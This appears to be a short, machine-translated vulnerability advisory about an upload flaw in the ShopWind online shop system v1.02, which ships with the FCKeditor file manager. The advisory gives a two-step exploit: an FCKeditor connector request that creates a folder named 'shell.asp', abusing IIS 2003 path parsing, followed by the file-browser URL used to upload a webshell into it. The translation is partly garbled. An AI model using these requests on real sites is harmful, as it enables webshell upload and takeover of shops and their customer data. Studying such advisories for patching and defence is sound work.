ShopWind online shop system v1. 0 2 upload vulnerability-vulnerability warning-the black bar safety net

2010-04-10T00:00:00
ID MYHACK58:62201026672
Type myhack58
Reporter 佚名
Modified 2010-04-10T00:00:00

Description

Old problems, this app is using FCKeditor editor.

The use of 2 0 0 3 The resolution problem. Directly say using the method!

The first step:

FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4

The second step:

fckeditor/editor/filemanager/browser/default/browser. html? Type=Image&Connector=../../connectors/asp/connector. asp